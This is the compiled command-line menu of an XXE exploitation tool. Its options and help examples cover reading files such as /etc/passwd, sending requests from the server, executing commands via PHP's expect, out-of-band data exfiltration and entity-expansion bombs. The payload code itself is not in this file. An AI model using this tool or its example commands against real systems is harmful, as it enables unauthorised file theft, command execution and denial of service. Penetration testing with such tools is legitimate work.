"use strict";
var __importStar = (this && this.__importStar) || function (mod) {
    if (mod && mod.__esModule) return mod;
    var result = {};
    if (mod != null) for (var k in mod) if (Object.hasOwnProperty.call(mod, k)) result[k] = mod[k];
    result["default"] = mod;
    return result;
};
Object.defineProperty(exports, "__esModule", { value: true });
var yargs = __importStar(require("yargs"));
var PayloadGenerator_1 = require("./PayloadGenerator");
var fs = __importStar(require("fs"));
var package_json_1 = require("../package.json");
var Menu = /** @class */ (function () {
    function Menu() {
    }
    Menu.parseOptions = function () {
        var argv = Menu.prepareYargs();
        return Menu.prepareOptions(argv);
    };
    Menu.prepareOptions = function (argv) {
        var encoding = argv.e === "phpbase64" ? PayloadGenerator_1.Encoding.PHP_BASE64 : PayloadGenerator_1.Encoding.NORMAL;
        var template = argv.t ? fs.readFileSync(argv.t).toString().replace(/(\r\n|\n|\r)/gm, "\n") : undefined;
        var commandarg = argv.command || argv.file_to_read || argv.URL || argv.expantions;
        var requestFile = argv.x ? fs.readFileSync(argv.x).toString() : undefined;
        var type = PayloadGenerator_1.Type.file;
        var mode = PayloadGenerator_1.Mode.XML;
        if (!argv._ || argv._.length !== 1) {
            yargs.showHelp();
            process.exit();
        }
        switch (argv._[0]) { //command
            case 'file':
                type = PayloadGenerator_1.Type.file;
                break;
            case 'expect':
                type = PayloadGenerator_1.Type.expect;
                break;
            case 'request':
                type = PayloadGenerator_1.Type.request;
                break;
            default: {
                yargs.showHelp();
                process.exit();
            }
        }
        switch (argv.m) {
            case 'cdata':
                mode = PayloadGenerator_1.Mode.CDATA;
                break;
            case 'oob':
                mode = PayloadGenerator_1.Mode.OOB;
                break;
            case 'xml':
                mode = PayloadGenerator_1.Mode.XML;
                break;
        }
        var address = argv.s;
        var port = argv.p;
        return {
            address: address,
            port: port,
            type: type,
            mode: mode,
            encoding: encoding,
            template: template,
            commandarg: commandarg,
            xxeIterations: argv.xee,
            requestFile: requestFile,
            output: argv.o,
            fuzz: argv.f,
            fuzzLine: "",
            wordlist: argv.w,
            originalCommandarg: commandarg,
            successString: argv.y,
            erroString: argv.n,
            requestOutput: argv.X
        };
    };
    Menu.prepareYargs = function () {
        var argv = yargs
            .usage(Menu.asciiArt() + '\n\nUsage: $0 [command] [options]')
            .command('file [file_to_read]', 'Use XXE to read a file', function (yargs) {
            yargs
                .positional('file_to_read', {
                describe: 'File path to read. Absolute path should start with a / (even on windows)',
            });
        })
            .command('request [URL]', 'Use XXE to do a request', function (yargs) {
            yargs
                .positional('URL', {
                describe: 'URL to do the request. FTP and other schemas are allowed as well',
            });
        })
            .command('expect [command]', 'Use XXE to execute a command through PHP\'s expect', function (yargs) {
            yargs
                .positional('command', {
                describe: 'Command to execute through PHP\'s expect',
            });
        })
            .command('xee [expantions]', 'Generate a huge content by resolving entities', function (yargs) {
            yargs
                .positional('expantions', {
                describe: 'Limit of entity expantions',
            });
        })
            .alias('s', 'server')
            .nargs('s', 1)
            .describe('s', 'Server address for OOB and DTD')
            .alias('p', 'port')
            .nargs('p', 1)
            .describe('p', 'Server port for OOB and DTDs. Default: 7777')
            .alias('t', 'template')
            .nargs('t', 1)
            .describe('t', 'path to an XML template where to inject payload')
            .alias('m', 'mode')
            .nargs('m', 1)
            .describe('m', 'Extraction Mode: xml, oob, cdata. Default: xml')
            .alias('e', 'encode')
            .nargs('e', 1)
            .describe('e', 'Extraction Encoding: none, phpbase64. Default: none')
            .alias('o', 'output')
            .nargs('o', 1)
            .describe('o', 'Output for the XML payload file. Default is to console')
            .nargs('x', 1)
            .describe('x', 'Use a request to automatically send the xml file')
            .nargs('X', 1)
            .alias('X', "request-output")
            .describe('X', 'Output the response from -x option. If not defined goes to stdout')
            .help('h')
            .alias('h', 'help')
            //ADVANCED OPTIONS
            .group("fuzz", "Fuzzing Specific Options")
            .alias('f', 'fuzz')
            .nargs("f", 0)
            .describe("f", "Enables fuzz options. Use {{FUZZ}} placeholder in the command arg for the magic.")
            .group("wordlist", "Fuzzing Specific Options")
            .nargs("w", 1)
            .alias('w', 'wordlist')
            .describe("w", "Path to a wordlist to be used with the fuzz command")
            .group("y", "Fuzzing Specific Options")
            .alias('y', 'success-string')
            .nargs("y", 1)
            .describe("y", "String to search for a success response in the requests")
            .group("n", "Fuzzing Specific Options")
            .alias('n', 'error-string')
            .nargs("n", 1)
            .describe("n", "String to search for an error response in the request")
            // .group("portscan", "Advanced")
            // .nargs("portscan", 1)
            //END ADVANCED OPTIONS
            .example('$0 expect ls', '')
            .example('$0 -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml', '')
            .example('$0 -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob', '')
            .example('$0 xee 900000000 -o output.xml', '')
            .example('$0 file /etc/passwd -x request.txt -t template.xml', '')
            .example('$0 file /root/{FUZZ} -f -w wordlist.txt -n "not found" -x request.txt', '')
            .epilog("Extra Info:\n  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to be injected\n  - When specifiying file paths for windows use forward slash.\n  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver. Usefull with blind attacks\n  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use cdata\n  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}\n  - When doing fuzz you need to supply a wordlist. You can add the {{FUZZ}} keyword in the main command argument. \n  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string, or an expected success string\n  ")
            .wrap(process.stdout.columns)
            .argv;
        return argv;
    };
    Menu.asciiArt = function () {
        return '\x1b[32m' +
            "    __   ____   ________            _       _ _            \n" +
            "    \\ \\ / /\\ \\ / /  ____|          | |     (_) |           \n" +
            "     \\ V /  \\ V /| |__  __  ___ __ | | ___  _| |_ ___ _ __ \n" +
            "      > <    > < |  __| \\ \\/ / '_ \\| |/ _ \\| | __/ _ \\ '__|\n" +
            "     / . \\  / . \\| |____ >  <| |_) | | (_) | | ||  __/ |   \n" +
            "    /_/ \\_\\/_/ \\_\\______/_/\\_\\ .__/|_|\\___/|_|\\__\\___|_|   \n" +
            "                             | |                           \n" +
            "                             |_|                           \n" +
            '                                    ///////                  \n' +
            '         <<<<<<<                   /:::::/      >>>>>>>      \n' +
            '        <:::::<                   /:::::/        >:::::>     \n' +
            '       <:::::<                   /:::::/          >:::::>    \n' +
            '      <:::::<                   /:::::/            >:::::>   \n' +
            '     <:::::<                   /:::::/              >:::::>  \n' +
            '    <:::::<                   /:::::/                >:::::> \n' +
            '   <:::::<                   /:::::/                  >:::::>\n' +
            '    <:::::<                 /:::::/                  >:::::> \n' +
            '     <:::::<               /:::::/                  >:::::>  \n' +
            '      <:::::<             /:::::/                  >:::::>   \n' +
            '       <:::::<           /:::::/                  >:::::>    \n' +
            '        <:::::<         /:::::/                  >:::::>     \n' +
            '         <<<<<<<       /:::::/                  >>>>>>>      \n' +
            '                      /:::::/                                \n' +
            '                     ///////                                 \n' +
            '                                                             \n' +
            '                      by luisfontes19                        \n' +
            ("                       Version " + package_json_1.version + "                    \n") +
            '                                                             \n' +
            '\x1b[0m';
    };
    return Menu;
}());
exports.Menu = Menu;
